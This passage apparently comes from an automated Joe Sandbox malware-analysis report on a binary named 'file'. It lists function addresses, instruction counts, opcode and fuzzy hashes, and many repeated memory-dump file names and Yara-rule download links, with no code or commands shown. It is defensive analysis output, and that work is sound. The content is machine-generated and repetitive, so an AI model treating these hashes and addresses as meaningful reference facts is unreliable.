                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                • Instruction ID: 620d7ac7f8c80ad4507af42e047a64efbe3e17418527936b96f23917a4168d79
                                • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                • Instruction Fuzzy Hash: 1591E371E002159BEF55CEE8DC80BFAB3A0BF55310F194568E908AB382D372DD95E7A1
                                Function 00F296FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                • Instruction ID: f5b7dca841a243cac03b531a7319974999394b6478fc64e9ec633330ac5ca766
                                • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                • Instruction Fuzzy Hash: 3CB15A32A146189FD715CF28D48ABA47BE0FF45364F29865CE899CF2A2C375E981DB40
                                Function 00EFB198 Relevance: .3, Instructions: 268COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                • Instruction ID: 03abbb5a2ecb296ce168eafba5098062e88f57aa7987ad1d31b1f6a0e4c7f779
                                • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                • Instruction Fuzzy Hash: 15C14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E996CF81
                                Function 00F0D5A8 Relevance: .3, Instructions: 258COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                • Instruction ID: 2de449d4d83d20c23d4d7b626059377f3f98591a5b462ff609612f7c6564ea4f
                                • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                • Instruction Fuzzy Hash: C79157319287906AEB168B7CCC427BAB794FFE6350F14C31AF988724A1FB718580A344
                                Function 00F1D39E Relevance: .2, Instructions: 242COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                • Instruction ID: dbc58c1afbb24afc95e0fbf09e4d7a66810e2592fb9e1301a0a3d70c32eeb0b6
                                • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                • Instruction Fuzzy Hash: A3A11E72E10A19DBEB19CF55CCC1A9EBBB1FB54324F14C62AD41AE72A0D334A984CF50
                                Function 00EE4288 Relevance: .2, Instructions: 240COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                • Instruction ID: fc969005ce44e3bd7765cad2d78a9af9da09d2718792c3c4efc5698826338804
                                • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                • Instruction Fuzzy Hash: ECA18172E083519BD308CF25C89075BF7E2EFC8710F1AC93DA89997254D774E8459B82
                                Function 011D6B7F Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f42437fec3e8111a50e924409450c59ca7618f21e9f79dcf5ff97fe4bea070ed
                                • Instruction ID: 87894ac24d721413be961732a2f75038fa046b9e1125af8d20d8ed37d6862b3f
                                • Opcode Fuzzy Hash: f42437fec3e8111a50e924409450c59ca7618f21e9f79dcf5ff97fe4bea070ed
                                • Instruction Fuzzy Hash: AF6135F3E0C2005FE7186E2DEC8577AB7D9DB94320F16453DEAC8D3740E97A98008296
                                Function 012D2B5A Relevance: .2, Instructions: 214COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3cf3eed83d0263e3d96a89bece9f7c50be6a77084f75b5537ace52049950389
                                • Instruction ID: 46068eeb295cb0143a9e8b71b5e2bbb37d90a51513b8324eecbe0da5177b0c72
                                • Opcode Fuzzy Hash: b3cf3eed83d0263e3d96a89bece9f7c50be6a77084f75b5537ace52049950389
                                • Instruction Fuzzy Hash: 3C61E1F3A087145FE3146E29EC8573AB7E5EF84320F1A493DEAC4D7380EA3858418796
                                Function 0124C367 Relevance: .2, Instructions: 191COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a23e9d9c12e646befc51719aecbac85b46722be8d913169615a6bb50b95d757d
                                • Instruction ID: a3e4f01848450db8c1480a2db9e03239ea815caac3eb388134f38e5e905a2802
                                • Opcode Fuzzy Hash: a23e9d9c12e646befc51719aecbac85b46722be8d913169615a6bb50b95d757d
                                • Instruction Fuzzy Hash: 97518AF3A182149BF30C6E3DEC95776BBD9DB54350F17063EDA89D3780D97958048286
                                Function 012A2B3E Relevance: .2, Instructions: 188COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e23f55192227c3793425ff6b55ceb6d7d095952e6bf0d0f6cfa0fabd637e2db
                                • Instruction ID: 86abdfd4c40eb22591ad33dc6ab0ef4298a80a732b927568bd26f2ea592fa525
                                • Opcode Fuzzy Hash: 9e23f55192227c3793425ff6b55ceb6d7d095952e6bf0d0f6cfa0fabd637e2db
                                • Instruction Fuzzy Hash: 7D51E4F361C6049BE308AE2DDC8577AF7DAEB98310F16463DE6C5C3740EA34A8018696
                                Function 01260870 Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e39290d6dcab25e314fa3aabe90b8943218b9445315f3e832e9fd32008e4007
                                • Instruction ID: 0cfa21dd3c3535aa0ef098dc9d45574a4b7807c14a9b0b6c93cfcbc37fe61144
                                • Opcode Fuzzy Hash: 0e39290d6dcab25e314fa3aabe90b8943218b9445315f3e832e9fd32008e4007
                                • Instruction Fuzzy Hash: CE41F5F3A142004BE3446A7DEC857BABAD6DF94324F1A463DEA85D77C0D93988058692
                                Function 00F16799 Relevance: .1, Instructions: 131COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                • Instruction ID: 9d429672c1c9b354cefbe7d0ad26eb3459462f5552bbf8075d40798e9945befb
                                • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                • Instruction Fuzzy Hash: A1513B63E09BD58AC7058B7544502EEBFB21FE6210F1E829EC4985F383C3759689D3E5
                                Function 0136AF7E Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
